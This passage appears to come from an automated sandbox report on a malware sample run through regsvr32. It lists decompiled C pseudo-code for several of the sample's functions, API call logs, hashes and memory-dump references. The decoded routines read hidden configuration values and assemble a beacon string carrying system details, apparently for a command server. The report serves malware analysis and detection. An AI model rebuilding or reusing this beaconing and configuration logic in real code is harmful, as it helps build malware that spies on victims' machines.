				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00fb1fc2
0x00fb1fcf
0x00fb1fd0
0x00fb1fd1
0x00fb1fd8
0x00fb2006
0x00fb2007
0x00fb200a
0x00fb2010
0x00000000
0x00000000
0x00fb1fef
0x00fb1ff9
0x00fb2000
0x00000000
0x00fb1ff1
0x00fb1ff4
0x00fb2014
0x00fb1ff6
0x00fb1ff6
0x00000000
0x00fb1ff6
0x00fb1ff4
0x00fb201b
0x00fb2021
0x00fb2021
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 00FB200A

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8b195716b1286d5bc9958eb5936de4296a4e97153e401d2a31ba0c423ee7bd8d
Instruction ID: 6c444ba2b139d6c452900a653c9262dfe10352da0e3c94f1e87ee3ab3a76495b
Opcode Fuzzy Hash: 8b195716b1286d5bc9958eb5936de4296a4e97153e401d2a31ba0c423ee7bd8d
Instruction Fuzzy Hash: 9EF04972C01218EFDB00EBD5C488AEEB7B8FF04355F1080AAE502A3200D3B46B84EF61

Uniqueness

Uniqueness Score: -1.00%

Function 00FB738C, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB738C(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E00FB181D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E00FB50CA(_a4);
				}
				return _t12;
			}

0x00fb7398
0x00fb739d
0x00fb73a1
0x00fb73a8
0x00fb73b3
0x00fb73b7
0x00fb73b7
0x00fb73c0

APIs

Part of subcall function 00FB181D: memcpy.NTDLL(00000000,00000110,00FB20FA,00FB20FA,?,?,00FB20FA,?,?,00FB6042,?), ref: 00FB1853
Part of subcall function 00FB181D: memset.NTDLL ref: 00FB18C8
Part of subcall function 00FB181D: memset.NTDLL ref: 00FB18DC

memcpy.NTDLL(00FB20FA,00FB20FA,00000000,00FB20FA,00FB20FA,00FB20FA,?,?,00FB6042,?,?,00FB20FA,?), ref: 00FB73A8

Part of subcall function 00FB50CA: RtlFreeHeap.NTDLL(00000000,00000000,00FB4239,00000000,00000001,?,00000000,?,?,?,00FB6B8D,00000000,?,00000001), ref: 00FB50D6

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 0e6eeedcb255031fa5e404f471041d1cea96e9d7798315364b05c0ee56672632
Instruction ID: 8e9799b0ad0d59820908c801f59ef078a6a007fe9fd56afcf3d70067e5ac6b5d
Opcode Fuzzy Hash: 0e6eeedcb255031fa5e404f471041d1cea96e9d7798315364b05c0ee56672632
Instruction Fuzzy Hash: B3E0867740421976CB123A95DC01EEB7F5CDF45790F044015FD0886201D639C910BBE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00FB2206, Relevance: 10.7, APIs: 7, Instructions: 204
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00FB2206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0xfba2d0; // 0x63699bc3
				if(E00FB1BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0xfba324 = _v8;
				}
				_t31 =  *0xfba2d0; // 0x63699bc3
				if(E00FB1BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0xfba2d0; // 0x63699bc3
				if(E00FB1BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0xfba290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0xfba2d0; // 0x63699bc3
						_t43 = E00FB38CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0xfba298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0xfba2d0; // 0x63699bc3
						_t44 = E00FB38CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0xfba29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0xfba2d0; // 0x63699bc3
						_t45 = E00FB38CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0xfba2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0xfba2d0; // 0x63699bc3
						_t46 = E00FB38CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0xfba004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0xfba2d0; // 0x63699bc3
						_t47 = E00FB38CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0xfba02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0xfba2d0; // 0x63699bc3
						_t48 = E00FB38CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E00FB3E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E00FB50DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0xfba2d0; // 0x63699bc3
						_t49 = E00FB38CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E00FB3E49(0, _t49) != 0) {
						_t102 =  *0xfba37c; // 0x5739630
						E00FB10DD(_t102 + 4, _t54);
					}
					_t50 =  *0xfba2d4; // 0x477d5a8
					_t20 = _t50 + 0xfbb252; // 0x57387fa
					_t21 = _t50 + 0xfbb7b5; // 0x6976612e
					 *0xfba320 = _t20;
					 *0xfba390 = _t21;
					HeapFree( *0xfba290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}

0x00fb2206
0x00fb2209
0x00fb2229
0x00fb2237
0x00fb2237
0x00fb223c
0x00fb2256
0x00fb242a
0x00fb2431
0x00fb2438
0x00fb2438
0x00fb225c
0x00fb2278
0x00fb2418
0x00fb2422
0x00000000
0x00fb227e
0x00fb227e
0x00fb2283
0x00fb2299
0x00fb2285
0x00fb2285
0x00fb2292
0x00fb2292
0x00fb22a3
0x00fb22a5
0x00fb22af
0x00fb22b4
0x00fb22b4
0x00fb22af
0x00fb22bb
0x00fb22d1
0x00fb22bd
0x00fb22bd
0x00fb22ca
0x00fb22ca
0x00fb22d5
0x00fb22d7
0x00fb22e1
0x00fb22e6
0x00fb22e6
0x00fb22e1
0x00fb22ed
0x00fb2303
0x00fb22ef
0x00fb22ef
0x00fb22fc
0x00fb22fc
0x00fb2307
0x00fb2309
0x00fb2313
0x00fb2318
0x00fb2318
0x00fb2313
0x00fb231f
0x00fb2335
0x00fb2321
0x00fb2321
0x00fb232e
0x00fb232e
0x00fb2339
0x00fb233b
0x00fb2345
0x00fb234a
0x00fb234a
0x00fb2345
0x00fb2351
0x00fb2367
0x00fb2353
0x00fb2353
0x00fb2360
0x00fb2360
0x00fb236b
0x00fb236d
0x00fb2377
0x00fb237c
0x00fb237c
0x00fb2377
0x00fb2383
0x00fb2399
0x00fb2385
0x00fb2385
0x00fb2392
0x00fb2392
0x00fb239d
0x00fb239f
0x00fb23a2
0x00fb23a3
0x00fb23aa
0x00fb23ac
0x00fb23ad
0x00fb23ad
0x00fb23aa
0x00fb23b4
0x00fb23ca
0x00fb23b6
0x00fb23b6
0x00fb23c3
0x00fb23c3
0x00fb23ce
0x00fb23dc
0x00fb23e6
0x00fb23e6
0x00fb23eb
0x00fb23f1
0x00fb23fe
0x00fb2404
0x00fb240a
0x00fb240f
0x00fb2415
0x00000000
0x00fb2415

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00FB55D3,?,00FB55D3,63699BC3,?,?,63699BC3,00FB55D3,?,63699BC3,E8FA7DD7,00FBA00C,7742C740), ref: 00FB22AB
StrToIntExA.SHLWAPI(00000000,00000000,00FB55D3,?,00FB55D3,63699BC3,?,?,63699BC3,00FB55D3,?,63699BC3,E8FA7DD7,00FBA00C,7742C740), ref: 00FB22DD
StrToIntExA.SHLWAPI(00000000,00000000,00FB55D3,?,00FB55D3,63699BC3,?,?,63699BC3,00FB55D3,?,63699BC3,E8FA7DD7,00FBA00C,7742C740), ref: 00FB230F
StrToIntExA.SHLWAPI(00000000,00000000,00FB55D3,?,00FB55D3,63699BC3,?,?,63699BC3,00FB55D3,?,63699BC3,E8FA7DD7,00FBA00C,7742C740), ref: 00FB2341
StrToIntExA.SHLWAPI(00000000,00000000,00FB55D3,?,00FB55D3,63699BC3,?,?,63699BC3,00FB55D3,?,63699BC3,E8FA7DD7,00FBA00C,7742C740), ref: 00FB2373
HeapFree.KERNEL32(00000000,?,?,00FB55D3,63699BC3,?,?,63699BC3,00FB55D3,?,63699BC3,E8FA7DD7,00FBA00C,7742C740), ref: 00FB240F
HeapFree.KERNEL32(00000000,?,?,00FB55D3,63699BC3,?,?,63699BC3,00FB55D3,?,63699BC3,E8FA7DD7,00FBA00C,7742C740), ref: 00FB2422

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6e4ae99b717b849fc50fde2831b084c9b6b5b90aa84d7a71d18e2a5a3dd529a2
Instruction ID: 8bbc01d7d9939a9c02fd016db0cbc6c6e6b92342f832a67ee8743473e0e9e92e
Opcode Fuzzy Hash: 6e4ae99b717b849fc50fde2831b084c9b6b5b90aa84d7a71d18e2a5a3dd529a2
Instruction Fuzzy Hash: 59618171E00108ABD751EBBADCC8DDF77EDAB48740B680A65B502D3115EA39DE40BF21

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6EFC, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00FB6EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0xfba290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0xfba018; // 0xff401b7a
					asm("bswap eax");
					_t32 =  *0xfba014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0xfba010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0xfba00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0xfba2d4; // 0x477d5a8
					_t2 = _t35 + 0xfbb613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0xfba02c,  *0xfba004, _t110);
					_t38 = E00FB6A09();
					_t39 =  *0xfba2d4; // 0x477d5a8
					_t3 = _t39 + 0xfbb653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0xfba2d4; // 0x477d5a8
						_t7 = _t92 + 0xfbb65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E00FB5040(_t99);
					_t44 =  *0xfba2d4; // 0x477d5a8
					_t9 = _t44 + 0xfbb302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0xfba2d4; // 0x477d5a8
					_t11 = _t48 + 0xfbb2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0xfba32c; // 0x57395b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0xfba2d4; // 0x477d5a8
						_t13 = _t88 + 0xfbb676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0xfba37c; // 0x5739630
					_a28 = E00FB2885(0xfba00a, _t105 + 4);
					_t55 =  *0xfba31c; // 0x57395e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0xfba2d4; // 0x477d5a8
						_t16 = _t84 + 0xfbb8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0xfba318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0xfba2d4; // 0x477d5a8
						_t18 = _t81 + 0xfbb8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0xfba290, _t107, 0x800);
						if(_t98 != _t107) {
							E00FB2DD0(GetTickCount());
							_t62 =  *0xfba37c; // 0x5739630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0xfba37c; // 0x5739630
							__imp__(_t66 + 0x40);
							_t68 =  *0xfba37c; // 0x5739630
							_t115 = E00FB624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0xfb92ac);
								_push(_t115);
								_t108 = E00FB21C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E00FB1032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E00FB1492();
									}
									HeapFree( *0xfba290, 0, _v24);
								}
								HeapFree( *0xfba290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0xfba290, _t107, _t98);
						}
						HeapFree( *0xfba290, _t107, _a20);
					}
					HeapFree( *0xfba290, _t107, _t117);
				}
				return _v16;
			}

0x00fb6efc
0x00fb6f10
0x00fb6f12
0x00fb6f20
0x00fb6f24
0x00fb6f2c
0x00fb6f34
0x00fb6f34
0x00fb6f36
0x00fb6f42
0x00fb6f51
0x00fb6f56
0x00fb6f59
0x00fb6f5e
0x00fb6f61
0x00fb6f66
0x00fb6f69
0x00fb6f75
0x00fb6f82
0x00fb6f84
0x00fb6f8a
0x00fb6f8f
0x00fb6f9a
0x00fb6f9c
0x00fb6f9f
0x00fb6fa5
0x00fb6fa7
0x00fb6fb0
0x00fb6fbb
0x00fb6fbd
0x00fb6fc0
0x00fb6fc0
0x00fb6fc2
0x00fb6fc9
0x00fb6fce
0x00fb6fdb
0x00fb6fdd
0x00fb6fe2
0x00fb6ff0
0x00fb6ff2
0x00fb6ff7
0x00fb6ffc
0x00fb6fff
0x00fb7004
0x00fb700f
0x00fb7011
0x00fb7014
0x00fb7014
0x00fb7016
0x00fb7029
0x00fb702d
0x00fb7032
0x00fb7036
0x00fb7039
0x00fb703e
0x00fb7049
0x00fb704b
0x00fb704e
0x00fb704e
0x00fb7050
0x00fb7057
0x00fb705a
0x00fb705f
0x00fb7069
0x00fb706b
0x00fb7072
0x00fb708a
0x00fb708e
0x00fb709a
0x00fb709f
0x00fb70a8
0x00fb70b9
0x00fb70bd
0x00fb70c6
0x00fb70cc
0x00fb70d9
0x00fb70e6
0x00fb70ec
0x00fb70f4
0x00fb70fa
0x00fb7100
0x00fb7104
0x00fb7108
0x00fb710e
0x00fb7112
0x00fb7119
0x00fb7120
0x00fb7124
0x00fb712f
0x00fb7136
0x00fb713a
0x00fb7143
0x00fb7143
0x00fb7154
0x00fb7154
0x00fb7163
0x00fb7169
0x00fb7169
0x00fb7173
0x00fb7173
0x00fb7184
0x00fb7184
0x00fb7192
0x00fb7192
0x00fb71a2

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 00FB6F1A
GetTickCount.KERNEL32 ref: 00FB6F2E
wsprintfA.USER32 ref: 00FB6F7D
wsprintfA.USER32 ref: 00FB6F9A
wsprintfA.USER32 ref: 00FB6FBB
wsprintfA.USER32 ref: 00FB6FD9
wsprintfA.USER32 ref: 00FB6FEE
wsprintfA.USER32 ref: 00FB700F
wsprintfA.USER32 ref: 00FB7049
wsprintfA.USER32 ref: 00FB7069
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00FB7084
GetTickCount.KERNEL32 ref: 00FB7094
RtlEnterCriticalSection.NTDLL(057395F0), ref: 00FB70A8
RtlLeaveCriticalSection.NTDLL(057395F0), ref: 00FB70C6

Part of subcall function 00FB624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00FB70D9,00000000,05739630), ref: 00FB6278
Part of subcall function 00FB624D: lstrlen.KERNEL32(00000000,?,00000000,00FB70D9,00000000,05739630), ref: 00FB6280
Part of subcall function 00FB624D: strcpy.NTDLL ref: 00FB6297
Part of subcall function 00FB624D: lstrcat.KERNEL32(00000000,00000000), ref: 00FB62A2
Part of subcall function 00FB624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00FB70D9,?,00000000,00FB70D9,00000000,05739630), ref: 00FB62BF

StrTrimA.SHLWAPI(00000000,00FB92AC,00000000,05739630), ref: 00FB70F4

Part of subcall function 00FB21C1: lstrlen.KERNEL32(057387FA,00000000,00000000,00000000,00FB7100,00000000), ref: 00FB21D1
Part of subcall function 00FB21C1: lstrlen.KERNEL32(?), ref: 00FB21D9
Part of subcall function 00FB21C1: lstrcpy.KERNEL32(00000000,057387FA), ref: 00FB21ED
Part of subcall function 00FB21C1: lstrcat.KERNEL32(00000000,?), ref: 00FB21F8

lstrcpy.KERNEL32(00000000,?), ref: 00FB7112
lstrcat.KERNEL32(00000000,00000000), ref: 00FB7120
lstrcat.KERNEL32(00000000,00000000), ref: 00FB7124
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00FB7154
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00FB7163
HeapFree.KERNEL32(00000000,00000000,00000000,05739630), ref: 00FB7173
HeapFree.KERNEL32(00000000,?), ref: 00FB7184
HeapFree.KERNEL32(00000000,00000000), ref: 00FB7192

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID:
API String ID: 1837416118-0
Opcode ID: 9c9c2f0e9e282cfd787a11dd367432193914304bce5b812732802cf398c0eba1
Instruction ID: 5c5c99057f73389a0bbb5497a74acecdbb32156fc6cc2db60e79c847ffeaee98
Opcode Fuzzy Hash: 9c9c2f0e9e282cfd787a11dd367432193914304bce5b812732802cf398c0eba1
Instruction Fuzzy Hash: C1718F71504209AFC721EB69ECC8E9677ECFB88350B090615F959C3221E67AE805BF72

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5927, Relevance: 16.6, APIs: 11, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00FB5927(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				WCHAR* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				WCHAR* _t91;

				_t79 =  *0xfba38c; // 0x5739ba0
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E00FB4E1B(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0xfb91ac;
				}
				_t46 = E00FB42F0(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E00FB6837(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0xfba2d4; // 0x477d5a8
						_t16 = _t75 + 0xfbbaa8; // 0x530025
						wsprintfW(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E00FB4E1B(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0xfb91b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E00FB6837(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E00FB50CA(_v20);
						} else {
							_t66 =  *0xfba2d4; // 0x477d5a8
							_t31 = _t66 + 0xfbbbc8; // 0x73006d
							wsprintfW(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E00FB50CA(_v12);
				}
				return _v24;
			}

0x00fb592f
0x00fb5935
0x00fb593c
0x00fb5942
0x00fb5946
0x00fb594a
0x00fb594d
0x00fb5954
0x00fb5957
0x00fb5959
0x00fb5959
0x00fb5962
0x00fb5969
0x00fb596c
0x00fb5972
0x00fb597c
0x00fb5985
0x00fb598c
0x00fb59a5
0x00fb59ac
0x00fb59af
0x00fb59b8
0x00fb59c1
0x00fb59d2
0x00fb59db
0x00fb59df
0x00fb59e3
0x00fb59ea
0x00fb59ed
0x00fb59ef
0x00fb59ef
0x00fb59f9
0x00fb5a02
0x00fb5a09
0x00fb5a21
0x00fb5a25
0x00fb5a62
0x00fb5a27
0x00fb5a2a
0x00fb5a32
0x00fb5a43
0x00fb5a4f
0x00fb5a57
0x00fb5a5b
0x00fb5a5b
0x00fb5a25
0x00fb5a6a
0x00fb5a6f
0x00fb5a76

APIs

GetTickCount.KERNEL32 ref: 00FB593C
lstrlen.KERNEL32(?,80000002,00000005), ref: 00FB597C
lstrlen.KERNEL32(00000000), ref: 00FB5985
lstrlen.KERNEL32(00000000), ref: 00FB598C
lstrlenW.KERNEL32(80000002), ref: 00FB5999
wsprintfW.USER32 ref: 00FB59D2
lstrlen.KERNEL32(?,00000004), ref: 00FB59F9
lstrlen.KERNEL32(?), ref: 00FB5A02
lstrlen.KERNEL32(?), ref: 00FB5A09
lstrlenW.KERNEL32(?), ref: 00FB5A10
wsprintfW.USER32 ref: 00FB5A43

Part of subcall function 00FB50CA: RtlFreeHeap.NTDLL(00000000,00000000,00FB4239,00000000,00000001,?,00000000,?,?,?,00FB6B8D,00000000,?,00000001), ref: 00FB50D6

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: lstrlen$wsprintf$CountFreeHeapTick
String ID:
API String ID: 822878831-0
Opcode ID: 53479e447a8baf01f5bbeff6756af8261b27e5e41622dae4c4f1e4b5a4de8977
Instruction ID: 29fe8761cbf6d3cd98f13602185ff837e6cbc349273843e80295e18afebaa5d0
Opcode Fuzzy Hash: 53479e447a8baf01f5bbeff6756af8261b27e5e41622dae4c4f1e4b5a4de8977
Instruction Fuzzy Hash: 02413772D00219EBCF11AFA5CD48ADE7BB5EF48754F050150EE04A7222D77A9A11FFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB51A8, Relevance: 13.6, APIs: 9, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00FB51A8(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t39;
				intOrPtr _t43;
				intOrPtr _t50;
				void* _t52;
				intOrPtr _t53;
				void* _t61;
				intOrPtr* _t66;
				intOrPtr* _t73;
				intOrPtr* _t76;

				_t1 = __eax + 0x14; // 0x74183966
				_t71 =  *_t1;
				_t39 = E00FB4F5A(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t39;
				if(_t39 != 0) {
					L12:
					return _v8;
				}
				E00FB77A4( *((intOrPtr*)(_t71 + 0xc)),  *((intOrPtr*)(_t71 + 8)), _v12);
				_t43 = _v12(_v12);
				_v8 = _t43;
